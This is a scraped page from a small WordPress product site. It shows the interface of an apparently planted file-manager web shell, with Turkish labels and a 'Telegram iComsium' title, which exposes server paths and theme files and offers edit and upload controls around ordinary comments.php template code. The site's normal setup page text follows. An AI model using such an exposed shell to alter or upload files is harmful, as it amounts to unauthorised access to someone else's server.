Telegram iComsium Current root:
/nas/content/live/myalphanotify/wp-content/themes/bastet
Current path:
/nas/content/live/myalphanotify/wp-content/themes/bastet
..
404.php
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
LICENSE
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
README.md
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
archive.php
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
bootstrap.css
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
bootstrap.min.css
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
comments.php
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
composer.json
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
css
fonts
footer-empty.php
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
footer.php
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
functions.php
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
gulpfile.js
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
header-empty.php
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
header.php
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
images
inc
index.php
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
js
languages
package.json
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
page-templates
page.php
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
phpcs.xml.dist
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
readme.txt
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
sass
screenshot.png
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
search.php
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
setup
sidebar.php
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
single.php
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
style-rtl.css
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
style.css
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
style.min.css
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
template-parts
vendor
webpack.config.js
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
woocommerce.css
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
woocommerce.min.css
|
[Göster]
|
[Düzenle]
|
[Yeniden Adlandır]
Dosya Düzenle: comments.php
<?php /** * The template for displaying comments. * * The area of the page that contains both current comments * and the comment form. * * @package bastet */ /* * If the current post is protected by a password and * the visitor has not yet entered the password we will * return early without loading the comments. */ if ( post_password_required() ) { return; } ?> <div class="comment-section" id="comments"> <div class="comment-form"> <?php if ( have_comments() ) : ?> <div class="comments-header"> <h3 class="comments-title"> <?php echo esc_html( bastet_comments_count( get_the_ID() ) ); ?> </h3> </div> <?php if ( get_comment_pages_count() > 1 && get_option( 'page_comments' ) ) : ?> <nav id="comment-nav-above" class="comment-navigation" role="navigation"> <h1 class="screen-reader-text"><?php esc_html_e( 'Comment navigation', 'bastet' ); ?></h1> <div class="nav-previous"><?php previous_comments_link( esc_html__( '← Older Comments', 'bastet' ) ); ?></div> <div class="nav-next"><?php next_comments_link( esc_html__( 'Newer Comments →', 'bastet' ) ); ?></div> </nav><!-- #comment-nav-above --> <?php endif; ?> <ol class="comment-list"> <?php wp_list_comments( array( 'avatar_size' => 36, 'max_depth' => 5, 'style' => 'ol', 'callback' => 'bastet_comments', 'short_ping' => true, ) ); ?> </ol><!-- .comment-list --> <?php if ( get_comment_pages_count() > 1 && get_option( 'page_comments' ) ) : ?> <nav id="comment-nav-below" class="comment-navigation" role="navigation"> <h1 class="screen-reader-text"><?php esc_html_e( 'Comment navigation', 'bastet' ); ?></h1> <div class="nav-previous"><?php previous_comments_link( esc_html__( '← Older Comments', 'bastet' ) ); ?></div> <div class="nav-next"><?php next_comments_link( esc_html__( 'Newer Comments →', 'bastet' ) ); ?></div> </nav> <?php endif; ?> <?php endif; ?> <?php if ( ! comments_open() && '0' !== get_comments_number() && post_type_supports( get_post_type(), 'comments' ) ) : ?> <p class="no-comments"><?php esc_html_e( 'Comments are closed.', 'bastet' ); ?></p> <?php endif; ?> <?php $bastet_commenter = wp_get_current_commenter(); $bastet_req = get_option( 'require_name_email' ); $bastet_aria_req = ( $bastet_req ? ' required' : '' ); $bastet_fields = array( 'author' => '<div class="row control-group form-inputs">' . '<div class="form-group col-md-4 col-xs-12 floating-label-form-group controls form-input author-field"> <input name="author" type="text" class="form-control" placeholder="Name" id="name" ' . esc_attr( $bastet_aria_req ) . ' value="' . esc_attr( $bastet_commenter['comment_author'] ) . '"> </div>', 'email' => '<div class="form-group col-md-4 col-xs-12 floating-label-form-group controls form-input email-field"> <input name="email" type="email" class="form-control" placeholder="Email Address" id="email" ' . esc_attr( $bastet_aria_req ) . ' value="' . esc_attr( $bastet_commenter['comment_author_email'] ) . '" data-validation-required-message=" ' . esc_html__( 'Please enter your email address.', 'bastet' ) . ' "> </div> ', 'url' => '<div class="form-group col-md-4 col-xs-12 floating-label-form-group controls form-input url-field"> <input type="text" name="url" class="form-control" placeholder="Website" id="website" ' . esc_attr( $bastet_aria_req ) . ' value="' . esc_attr( $bastet_commenter['comment_author_url'] ) . '" > </div> </div>', ); $bastet_custom_comment_field = '<div class=" control-group"> <div class="form-group col-xs-12 floating-label-form-group controls comment-field"> <label>' . esc_html__( 'Comment *', 'bastet' ) . ' </label> <textarea rows="5" class="form-control" name="comment" placeholder="Comment" id="comment" required > </textarea> </div> </div>'; $bastet_comments_args = array( 'fields' => $bastet_fields, 'comment_field' => $bastet_custom_comment_field, 'label_submit' => esc_html__( 'Post Comment', 'bastet' ), 'submit_button' => '<button id="%2$s" class="%3$s"><span class="text">%4$s</span></button>', 'class_submit' => 'btn btn-primary', ); comment_form( $bastet_comments_args ); ?> </div> </div><!-- #comments -->
Kaydet
Dosya Yükle
Yükle
setup - Alpha Notify
Home
setup
Buy Now
Contact US
Cart
setup
Power Outage
Device Setup
Download
our Mobile Setup PDF for a complete how-to guide.
Home
setup
Buy Now
Contact US
Cart
Archives
May 2026
Categories
Uncategorized
Search for: